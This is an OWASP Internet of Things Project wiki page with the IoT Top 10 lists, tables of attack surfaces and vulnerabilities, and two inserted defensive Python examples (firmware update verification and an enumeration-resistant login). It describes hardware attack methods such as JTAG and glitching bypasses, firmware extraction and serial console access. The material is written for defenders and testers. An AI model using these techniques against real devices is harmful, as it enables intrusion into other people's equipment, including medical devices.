[[Category:OWASP_Release_Quality_Document]]</div>Aaron.guzmanhttps://wiki.owasp.org/index.php?title=OWASP_Internet_of_Things_Project&diff=246179OWASP Internet of Things Project2018-12-19T23:27:54Z<p>Aaron.guzman: /* Classifications */</p>
<hr />
<div>= Main =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
==Updated!==<br />
<br />
The OWASP IoT Project for 2018 has just been released!<br />
<br />
[[File:2018 IoT Top10.png|center|thumb|1290x1290px]]<br />
<br />
==OWASP Internet of Things (IoT) Project==<br />
<br />
Oxford defines the Internet of Things as: “A proposed development of the Internet in which everyday objects have network connectivity, allowing them to send and receive data.”<br />
<br />
''The OWASP Internet of Things Project is designed to help manufacturers, developers, and consumers better understand the security issues associated with the Internet of Things, and to enable users in any context to make better security decisions when building, deploying, or assessing IoT technologies''. <br />
<br />
The project looks to define a structure for various IoT sub-projects such as Attack Surface Areas, Testing Guides and Top Vulnerabilities.<br />
<br />
==Licensing==<br />
The OWASP Internet of Things Project is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/3.0/ Creative Commons Attribution-ShareAlike 3.0 license], so you can copy, distribute and transmit the work, adapt it, and use it commercially, provided that you attribute the work and, if you alter, transform, or build upon it, distribute the resulting work only under the same or a similar license.<br />
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:200px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the OWASP Internet of Things Project? ==<br />
<br />
The OWASP Internet of Things Project provides information on:<br />
<br />
* [https://www.owasp.org/index.php/IoT_Attack_Surface_Areas IoT Attack Surface Areas]<br />
* IoT Vulnerabilities<br />
* Firmware Analysis<br />
* ICS/SCADA Software Weaknesses<br />
* Community Information<br />
* [https://www.owasp.org/index.php/IoT_Testing_Guides IoT Testing Guides]<br />
* [https://www.owasp.org/index.php/IoT_Security_Guidance IoT Security Guidance]<br />
* [https://www.owasp.org/index.php/Principles_of_IoT_Security Principles of IoT Security]<br />
* [https://www.owasp.org/index.php/IoT_Framework_Assessment IoT Framework Assessment]<br />
* Developer, Consumer and Manufacturer Guidance<br />
* Design Principles<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Contributors ==<br />
* [https://www.owasp.org/index.php/User:Justin_C._Klein_Keane Justin Klein Keane]<br />
* Saša Zdjelar<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Project|OWASP Project Repository]]<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
* [https://www.owasp.org/index.php/OWASP_Embedded_Application_Security OWASP Embedded Application Security]<br />
* [https://www.owasp.org/index.php/C-Based_Toolchain_Hardening OWASP C-based Toolchain Hardening]<br />
<br />
| style="padding-left:25px;width:200px;" valign="top" |<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The OWASP Slack Channel]<br />
<br />
Hint: If you're new to Slack, [https://lists.owasp.org/pipermail/owasp-community/2015-July/000703.html join OWASP's slack channel first], then join #iot-security within OWASP's channel.<br />
<br />
== Quick Download ==<br />
[https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top Ten 2018]<br />
<br />
[https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
<br />
[https://www.owasp.org/images/7/7b/IoT_Preso_v1.pptx Quick discussion on IoT]<br />
<br />
[https://www.owasp.org/images/3/36/IoTTestingMethodology.pdf IoT Attack Surface Mapping DEFCON 23]<br />
<br />
[https://www.owasp.org/images/2/2d/Iot_testing_methodology.JPG IoT Testing Guidance Handout]<br />
<br />
[https://www.owasp.org/images/7/71/Internet_of_Things_Top_Ten_2014-OWASP.pdf OWASP IoT Top Ten PDF]<br />
<br />
[https://www.owasp.org/images/8/8e/Infographic-v1.jpg OWASP IoT Top Ten Infographic]<br />
<br />
[https://www.owasp.org/images/0/01/Internet_of_Things_Top_Ten_2014-OWASP-ppt.pptx OWASP IoT Top Ten PPT]<br />
<br />
[https://www.owasp.org/images/5/51/RSAC2015-OWASP-IoT-Miessler.pdf OWASP IoT Top Ten-RSA 2015]<br />
<br />
[https://www.owasp.org/images/b/bd/OWASP-IoT.pptx OWASP IoT Project Overview]<br />
<br />
== News and Events ==<br />
* [https://1drv.ms/v/s!AucQMYXJNefdwAwa5IPz2cg3cvWe OWASP IoT 2018 Planning Session]<br />
* Added a [https://owasp-iot-security.slack.com/ Slack channel]<br />
* Added a sub-project; [https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project#tab=IoT_Security_Policy_Project IoT Security Policy Project]<br />
* Daniel Miessler gave his [https://www.youtube.com/watch?v=RhxHHD790nw IoT talk at DEFCON 23]<br />
* Migrating the IoT Top Ten to be under the IoT Project<br />
* HP Study Reveals 70 Percent of Internet of Things Devices Vulnerable to Attack<br />
<br />
==Classifications==<br />
<br />
{| width="200" cellpadding="2"<br />
|-<br />
| rowspan="2" width="50%" valign="top" align="center" | [[File:Owasp-incubator-trans-85.png|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Incubator_Projects]]<br />
| width="50%" valign="top" align="center" | [[File:Owasp-builders-small.png|link=]] <br />
|-<br />
| width="50%" valign="top" align="center" | [[File:Owasp-defenders-small.png|link=]]<br />
|-<br />
| colspan="2" align="center" | [[File:Cc-button-y-sa-small.png|link=http://creativecommons.org/licenses/by-sa/3.0/]]<br />
|-<br />
| colspan="2" align="center" | [[File:Project_Type_Files_DOC.jpg|link=]]<br />
|}<br />
<br />
|}<br />
<br />
= IoT Top 10 =<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
== Internet of Things (IoT) Top 10 2018 ==<br />
The [https://www.owasp.org/images/1/1c/OWASP-IoT-Top-10-2018-final.pdf OWASP IoT Top 10 - 2018] is now available.<br />
* I1 Weak, Guessable, or Hardcoded Passwords<br />
* I2 Insecure Network Services<br />
* I3 Insecure Ecosystem Interfaces<br />
* I4 Lack of Secure Update Mechanism<br />
* I5 Use of Insecure or Outdated Components<br />
* I6 Insufficient Privacy Protection<br />
* I7 Insecure Data Transfer and Storage<br />
* I8 Lack of Device Management<br />
* I9 Insecure Default Settings<br />
* I10 Lack of Physical Hardening<br />
== Internet of Things (IoT) Top 10 2014 ==<br />
* [[Top 10 2014-I1 Insecure Web Interface|I1 Insecure Web Interface]]<br />
* [[Top 10 2014-I2 Insufficient Authentication/Authorization|I2 Insufficient Authentication/Authorization]]<br />
* [[Top 10 2014-I3 Insecure Network Services|I3 Insecure Network Services]]<br />
* [[Top 10 2014-I4 Lack of Transport Encryption|I4 Lack of Transport Encryption]]<br />
* [[Top 10 2014-I5 Privacy Concerns|I5 Privacy Concerns]]<br />
* [[Top 10 2014-I6 Insecure Cloud Interface|I6 Insecure Cloud Interface]]<br />
* [[Top 10 2014-I7 Insecure Mobile Interface|I7 Insecure Mobile Interface]]<br />
* [[Top 10 2014-I8 Insufficient Security Configurability|I8 Insufficient Security Configurability]]<br />
* [[Top 10 2014-I9 Insecure Software/Firmware|I9 Insecure Software/Firmware]]<br />
* [[Top 10 2014-I10 Poor Physical Security|I10 Poor Physical Security]]<br />
<br />
= IoT Attack Surface Areas =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Attack Surface Areas Project ==<br />
<br />
The OWASP IoT Attack Surface Areas (DRAFT) are as follows:<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
** UART (Serial)<br />
** JTAG / SWD<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure ([[Top 10 2013-A6-Sensitive Data Exposure|See OWASP Top 10 - A6 Sensitive data exposure]]):<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
** Check for old software versions and the known attacks against them (Heartbleed, Shellshock, old PHP versions, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade possibility<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Firmware loaded over insecure channel (no TLS)<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Check for insecure direct object references<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
<br />
* Standard set of web application vulnerabilities, see:<br />
** [[:Category:OWASP Top Ten Project|OWASP Web Top 10]]<br />
** [[:Category:OWASP Application Security Verification Standard Project|OWASP ASVS]]<br />
** [[:Category:OWASP Testing Project|OWASP Testing guide]]<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
| '''Third-party Backend APIs'''<br />
|<br />
* Unencrypted PII sent<br />
* Encrypted PII sent<br />
* Device information leaked<br />
* Location leaked<br />
|- <br />
| '''Update Mechanism'''<br />
|<br />
* Update sent without encryption<br />
* Updates not signed<br />
* Update location writable<br />
* Update verification<br />
* Update authentication<br />
* Malicious update<br />
* Missing update mechanism<br />
* No manual update mechanism<br />
|- <br />
| '''Mobile Application'''<br />
|<br />
* Implicitly trusted by device or cloud<br />
* Username enumeration<br />
* Account lockout<br />
* Known default credentials<br />
* Weak passwords<br />
* Insecure data storage<br />
* Transport encryption<br />
* Insecure password recovery mechanism<br />
* Two-factor authentication<br />
|- <br />
| '''Vendor Backend APIs'''<br />
|<br />
* Inherent trust of cloud or mobile application<br />
* Weak authentication<br />
* Weak access controls<br />
* Injection attacks<br />
* Hidden services<br />
|- <br />
| '''Ecosystem Communication'''<br />
|<br />
* Health checks<br />
* Heartbeats<br />
* Ecosystem commands<br />
* Deprovisioning<br />
* Pushing updates<br />
|- <br />
| '''Network Traffic'''<br />
|<br />
* LAN<br />
* LAN to Internet<br />
* Short range<br />
* Non-standard<br />
* Wireless (WiFi, Z-wave, XBee, Zigbee, Bluetooth, LoRA)<br />
* Protocol fuzzing<br />
|- <br />
| '''Authentication/Authorization'''<br />
|<br />
* Authentication/Authorization related values (session key, token, cookie, etc.) disclosure<br />
* Reusing of session key, token, etc.<br />
* Device to device authentication<br />
* Device to mobile Application authentication<br />
* Device to cloud system authentication<br />
* Mobile application to cloud system authentication<br />
* Web application to cloud system authentication<br />
* Lack of dynamic authentication<br />
|-<br />
| '''Privacy'''<br />
|<br />
* User data disclosure<br />
* User/device location disclosure<br />
* Differential privacy<br />
|-<br />
| '''Hardware (Sensors)'''<br />
|<br />
* Sensing Environment Manipulation<br />
* Tampering (Physically)<br />
* Damage (Physical)<br />
|-<br />
|}<br />
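The '''Update Mechanism''' and '''Device Firmware''' rows above list unsigned updates, missing update verification and firmware downgrade as weaknesses. The following is an added example (not OWASP project code) of the client-side checks an update agent should enforce before installing an image: authenticate the manifest before trusting anything in it, bind the payload to the manifest by hash, and refuse any version that is not newer than the installed one. The manifest format, field names and the HMAC stand-in for a real asymmetric signature are assumptions of this example; a production device would verify an Ed25519 or RSA signature against a public key baked into the firmware.<br />

```python
"""Firmware update verification: added example, not OWASP project code.

Demonstrates fail-closed checks for an IoT update client: manifest
authentication, payload-to-manifest binding by hash, and anti-rollback.
The manifest layout and the keyed-MAC stand-in for a signature are
assumptions made for this example.
"""
import hashlib
import hmac
import json
from typing import Callable, Tuple

# In a real device this would be a public key for an asymmetric signature;
# a constructed HMAC key is used only so the example runs with the stdlib.
DEVICE_UPDATE_KEY = b"constructed-example-key-not-for-production"


def hmac_verifier(key: bytes) -> Callable[[bytes, bytes], bool]:
    """Return verify(message, tag); stand-in for signature verification."""
    def verify(message: bytes, tag: bytes) -> bool:
        expected = hmac.new(key, message, hashlib.sha256).digest()
        return hmac.compare_digest(expected, tag)
    return verify


def verify_update(manifest_bytes: bytes, tag: bytes, payload: bytes,
                  installed_version: int,
                  verify_sig: Callable[[bytes, bytes], bool]) -> Tuple[bool, str]:
    """Return (ok, reason). Any check that does not pass rejects the update."""
    # 1. Authenticate the manifest before parsing or trusting its contents.
    if not verify_sig(manifest_bytes, tag):
        return False, "manifest authentication failed"
    try:
        manifest = json.loads(manifest_bytes.decode("utf-8"))
        version = int(manifest["version"])
        expected_sha256 = manifest["sha256"]
    except (ValueError, KeyError, UnicodeDecodeError) as exc:
        return False, f"malformed manifest: {exc}"
    # 2. Anti-rollback: a genuinely signed but older release is still rejected.
    if version <= installed_version:
        return False, (f"downgrade or replay rejected "
                       f"(installed {installed_version}, offered {version})")
    # 3. Bind the payload to the authenticated manifest by hash.
    actual = hashlib.sha256(payload).hexdigest()
    if not hmac.compare_digest(actual, expected_sha256):
        return False, "payload hash does not match manifest"
    return True, "update accepted"


def make_manifest(version: int, payload: bytes, key: bytes) -> Tuple[bytes, bytes]:
    """Vendor side, constructed for the demo: build and authenticate a manifest."""
    body = json.dumps({"version": version,
                       "sha256": hashlib.sha256(payload).hexdigest()},
                      sort_keys=True).encode("utf-8")
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return body, tag


def demo() -> dict:
    """Run the verifier against a good update and three failure cases."""
    verify = hmac_verifier(DEVICE_UPDATE_KEY)
    firmware = b"\x7fELF constructed firmware image v5"   # constructed payload
    manifest, tag = make_manifest(5, firmware, DEVICE_UPDATE_KEY)
    return {
        "good": verify_update(manifest, tag, firmware, 4, verify),
        # payload swapped while the genuine manifest is kept
        "tampered_payload": verify_update(manifest, tag, firmware + b"\x90", 4, verify),
        # genuinely signed release offered to a device already on that version
        "downgrade": verify_update(manifest, tag, firmware, 5, verify),
        # manifest edited without the key, so authentication fails first
        "forged_manifest": verify_update(
            manifest.replace(b'"version": 5', b'"version": 9'), tag, firmware, 4, verify),
    }


if __name__ == "__main__":
    for name, (ok, reason) in demo().items():
        print(f"{name:17s} ok={ok} ({reason})")
```

The order of the checks matters: the manifest is authenticated before it is parsed, so a forged manifest never gets to influence the version or hash comparison, and the version check runs before the (comparatively expensive) payload hash so a replayed old release is rejected early.<br />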
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Attack Surface Areas Project? ==<br />
<br />
The IoT Attack Surface Areas Project provides a list of attack surfaces that should be understood by manufacturers, developers, security researchers, and those looking to deploy or implement IoT technologies within their organizations.<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [https://www.owasp.org/index.php/OWASP_Mobile_Security_Project The OWASP Mobile Top 10 Project]<br />
* [https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project The OWASP Web Top 10 Project]<br />
<br />
== Collaboration ==<br />
[https://owasp.slack.com The Slack Channel]<br />
<br />
== Quick Download ==<br />
* Coming Soon<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= IoT Vulnerabilities =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== IoT Vulnerabilities Project ==<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Vulnerability<br />
! Attack Surface<br />
! Summary<br />
|-<br />
| '''Username Enumeration'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to collect a set of valid usernames by interacting with the authentication mechanism<br />
|-<br />
| '''Weak Passwords'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to set account passwords to weak values such as '1234' or '123456'<br />
* Usage of pre-programmed default passwords<br />
|-<br />
| '''Account Lockout'''<br />
|<br />
* Administrative Interface<br />
* Device Web Interface<br />
* Cloud Interface<br />
* Mobile Application<br />
|<br />
* Ability to continue sending authentication attempts after 3 - 5 failed login attempts<br />
|-<br />
| '''Unencrypted Services'''<br />
|<br />
* Device Network Services<br />
|<br />
* Network services are not properly encrypted to prevent eavesdropping or tampering by attackers<br />
|-<br />
| '''Two-factor Authentication'''<br />
|<br />
* Administrative Interface<br />
* Cloud Web Interface<br />
* Mobile Application<br />
|<br />
* Lack of two-factor authentication mechanisms such as a security token or fingerprint scanner<br />
|-<br />
| '''Poorly Implemented Encryption'''<br />
|<br />
* Device Network Services<br />
|<br />
* Encryption is implemented, but it is improperly configured or not kept up to date, e.g. still using SSL v2<br />
|-<br />
| '''Update Sent Without Encryption'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Updates are transmitted over the network without using TLS or encrypting the update file itself<br />
|-<br />
| '''Update Location Writable'''<br />
|<br />
* Update Mechanism<br />
|<br />
* Storage location for update files is world writable potentially allowing firmware to be modified and distributed to all users<br />
|-<br />
| '''Denial of Service'''<br />
|<br />
* Device Network Services<br />
|<br />
* A service can be attacked in a way that denies availability of that service or of the entire device<br />
|-<br />
| '''Removal of Storage Media'''<br />
|<br />
* Device Physical Interfaces<br />
|<br />
* Ability to physically remove the storage media from the device<br />
|-<br />
| '''No Manual Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to manually force an update check for the device<br />
|-<br />
| '''Missing Update Mechanism'''<br />
|<br />
* Update Mechanism<br />
|<br />
* No ability to update device<br />
|-<br />
| '''Firmware Version Display and/or Last Update Date'''<br />
|<br />
* Device Firmware<br />
|<br />
* Current firmware version is not displayed and/or the last update date is not displayed<br />
|-<br />
| '''Firmware and storage extraction'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://www.flashrom.org/Flashrom In-Situ dumping]<br />
* Intercepting an OTA update<br />
* Downloading from the manufacturer's web page<br />
* [https://www.exploitee.rs/index.php/Exploitee.rs_Low_Voltage_e-MMC_Adapter eMMC tapping]<br />
* Unsoldering the SPI Flash / eMMC chip and reading it in an adapter<br />
|<br />
* Firmware contains a lot of useful information, such as the source code and binaries of running services, pre-set passwords, SSH keys, etc.<br />
|-<br />
| '''Manipulating the code execution flow of the device'''<br />
|<br />
* JTAG / SWD interface<br />
* [https://wiki.newae.com/Main_Page Side channel attacks like glitching]<br />
|<br />
* With a JTAG adapter and gdb, the execution of the firmware on the device can be modified, bypassing almost all software-based security controls.<br />
* Side channel attacks can also modify the execution flow or be used to leak sensitive information from the device<br />
|-<br />
| '''Obtaining console access'''<br />
|<br />
* Serial interfaces (SPI / UART)<br />
|<br />
* By connecting to a serial interface, full console access to the device is typically obtained<br />
* Usual security measures include custom bootloaders that prevent entering single user mode, but these can also be bypassed.<br />
|-<br />
| '''Insecure 3rd party components'''<br />
|<br />
* Software<br />
|<br />
* Out of date versions of busybox, openssl, ssh, web servers, etc.<br />
|-<br />
<br />
|}<br />
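Three of the rows above ('''Username Enumeration''', '''Weak Passwords''' and '''Account Lockout''') describe the same authentication mechanism failing in related ways. The following is an added example (not OWASP project code) of a login handler that addresses them together: unknown, locked and wrong-password attempts all receive the same response and perform the same hashing work, so neither the message nor the timing reveals which user names exist; consecutive failures lock the account for a cooldown period while the lockout itself is recorded server-side rather than told to the client. The account store, user names, thresholds and audit list are constructed for this example.<br />

```python
"""Enumeration-resistant login with account lockout: added example, not
OWASP project code. Account store, thresholds and names are constructed."""
import hashlib
import hmac
import os
import time
from dataclasses import dataclass

MAX_FAILURES = 5          # lock after the fifth consecutive failure (assumed policy)
LOCKOUT_SECONDS = 900     # 15-minute cooldown (assumed policy)
GENERIC_FAILURE = "invalid credentials"   # same text for every failure mode


def hash_password(password: str, salt: bytes) -> bytes:
    """Slow, salted hash so stolen records are not cheaply brute-forced."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


@dataclass
class Account:
    salt: bytes
    pw_hash: bytes
    failures: int = 0
    locked_until: float = 0.0


class Authenticator:
    def __init__(self, clock=time.time):
        self.clock = clock            # injectable for tests
        self.accounts = {}
        self.audit = []               # server-side record of lockouts
        # Dummy record: unknown users get the same PBKDF2 work and the same
        # answer as real users, so response content and timing match.
        salt = os.urandom(16)
        self._dummy = Account(salt, hash_password(os.urandom(16).hex(), salt))

    def register(self, username: str, password: str) -> None:
        salt = os.urandom(16)
        self.accounts[username] = Account(salt, hash_password(password, salt))

    def is_locked(self, username: str) -> bool:
        acct = self.accounts.get(username)
        return acct is not None and acct.locked_until > self.clock()

    def login(self, username: str, password: str) -> str:
        now = self.clock()
        known = username in self.accounts
        acct = self.accounts[username] if known else self._dummy
        # Always do the full comparison, whatever the outcome will be.
        match = hmac.compare_digest(hash_password(password, acct.salt), acct.pw_hash)
        if not known:
            return GENERIC_FAILURE
        if acct.locked_until and now >= acct.locked_until:
            acct.failures, acct.locked_until = 0, 0.0     # cooldown elapsed
        if acct.locked_until > now:
            self.audit.append(f"attempt on locked account {username}")
            return GENERIC_FAILURE        # not "account locked": that would confirm the name
        if match:
            acct.failures = 0
            return "ok"
        acct.failures += 1
        if acct.failures >= MAX_FAILURES:
            acct.locked_until = now + LOCKOUT_SECONDS
            self.audit.append(f"account {username} locked after {acct.failures} failures")
        return GENERIC_FAILURE


def demo() -> dict:
    """Walk through unknown user, repeated failures, lockout and cooldown."""
    t = [1_000_000.0]                                  # controllable fake clock
    auth = Authenticator(clock=lambda: t[0])
    auth.register("alice", "correct horse battery staple")   # constructed account
    out = {}
    out["unknown_user"] = auth.login("mallory", "anything")
    out["wrong_password"] = auth.login("alice", "guess1")
    for i in range(2, MAX_FAILURES + 1):
        auth.login("alice", f"guess{i}")
    out["locked_even_with_right_password"] = auth.login("alice", "correct horse battery staple")
    out["locked_flag"] = auth.is_locked("alice")
    t[0] += LOCKOUT_SECONDS + 1
    out["after_cooldown"] = auth.login("alice", "correct horse battery staple")
    out["audit"] = list(auth.audit)
    return out


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

Returning the generic message for a locked account is a deliberate trade-off: telling the client "account locked" would turn the lockout into an enumeration oracle, so the lockout is visible only in the server-side audit record, which is also where detection logic (alerting on bursts of lockouts) should hook in.<br />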
<br />
{{Social Media Links}}<br />
<br />
| style="padding-left:25px;width:300px;border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== What is the IoT Vulnerabilities Project? ==<br />
<br />
The IoT Vulnerabilities Project provides:<br />
<br />
* Information on the top IoT vulnerabilities<br />
* The attack surface associated with the vulnerability<br />
* A summary of the vulnerability<br />
<br />
== Project Leaders ==<br />
<br />
* Daniel Miessler<br />
* Craig Smith<br />
<br />
== Related Projects ==<br />
<br />
* [[OWASP_Mobile_Security_Project|OWASP Mobile Security]]<br />
* [[OWASP_Top_Ten_Project|OWASP Web Top 10]]<br />
<br />
== Collaboration ==<br />
[https://owasp-iot-security.slack.com The Slack Channel]<br />
<br />
== Resources ==<br />
* [https://www.owasp.org/index.php/Top_IoT_Vulnerabilities Top 10 IoT Vulnerabilities from 2014]<br />
<br />
== News and Events ==<br />
* Coming Soon<br />
<br />
|}<br />
<br />
= Medical Devices =<br />
<br />
<div style="width:100%;height:160px;border:0,margin:0;overflow: hidden;">[[File:OWASP_Project_Header.jpg|link=]]</div><br />
<br />
{| style="padding: 0;margin:0;margin-top:10px;text-align:left;" |-<br />
| style="border-right: 1px dotted gray;padding-right:25px;" valign="top" |<br />
<br />
== Medical Device Testing ==<br />
<br />
The Medical Device Testing project is intended to provide some basic attack surface considerations that should be evaluated before shipping medical device equipment.<br />
<br />
{| class="wikitable" style="text-align: left" border="1"<br />
! Attack Surface<br />
! Vulnerability<br />
|- <br />
| '''Ecosystem (general)'''<br />
|<br />
* Interoperability standards<br />
* Data governance<br />
* System wide failure<br />
* Individual stakeholder risks<br />
* Implicit trust between components<br />
* Enrollment security<br />
* Decommissioning system<br />
* Lost access procedures<br />
|- <br />
| '''HL7'''<br />
|<br />
* XML Parsing<br />
** XSS<br />
* Information Disclosure<br />
|- <br />
| '''Device Memory'''<br />
|<br />
* Sensitive data<br />
** Cleartext usernames<br />
** Cleartext passwords<br />
** Third-party credentials<br />
** Encryption keys<br />
|- <br />
| '''Device Physical Interfaces'''<br />
|<br />
* Firmware extraction<br />
* User CLI<br />
* Admin CLI<br />
* Privilege escalation<br />
* Reset to insecure state<br />
* Removal of storage media<br />
* Tamper resistance<br />
* Debug port<br />
* Device ID/Serial number exposure<br />
|-<br />
| '''Device Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Device Firmware'''<br />
|<br />
* Sensitive data exposure:<br />
** Backdoor accounts<br />
** Hardcoded credentials<br />
** Encryption keys<br />
** Encryption (Symmetric, Asymmetric)<br />
** Sensitive information<br />
** Sensitive URL disclosure<br />
* Firmware version display and/or last update date<br />
* Vulnerable services (web, ssh, tftp, etc.)<br />
* Security related function API exposure<br />
* Firmware downgrade<br />
|- <br />
| '''Device Network Services'''<br />
|<br />
* Information disclosure<br />
* User CLI<br />
* Administrative CLI<br />
* Injection<br />
* Denial of Service<br />
* Unencrypted Services<br />
* Poorly implemented encryption<br />
* Test/Development Services<br />
* Buffer Overflow<br />
* UPnP<br />
* Vulnerable UDP Services<br />
* DoS<br />
* Device Firmware OTA update block<br />
* Replay attack<br />
* Lack of payload verification<br />
* Lack of message integrity check<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
|- <br />
| '''Administrative Interface'''<br />
|<br />
* Standard web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
** Username enumeration<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Security/encryption options<br />
* Logging options<br />
* Two-factor authentication<br />
* Inability to wipe device<br />
|- <br />
| '''Local Data Storage'''<br />
|<br />
* Unencrypted data<br />
* Data encrypted with discovered keys<br />
* Lack of data integrity checks<br />
* Use of the same static encryption/decryption key across devices<br />
|- <br />
| '''Cloud Web Interface'''<br />
|<br />
* Standard set of web vulnerabilities:<br />
** SQL injection<br />
** Cross-site scripting<br />
** Cross-site Request Forgery<br />
* Credential management vulnerabilities:<br />
** Username enumeration<br />
** Weak passwords<br />
** Account lockout<br />
** Known default credentials<br />
** Insecure password recovery mechanism<br />
* Transport encryption<br />
* Two-factor authentication<br />
|- <br />
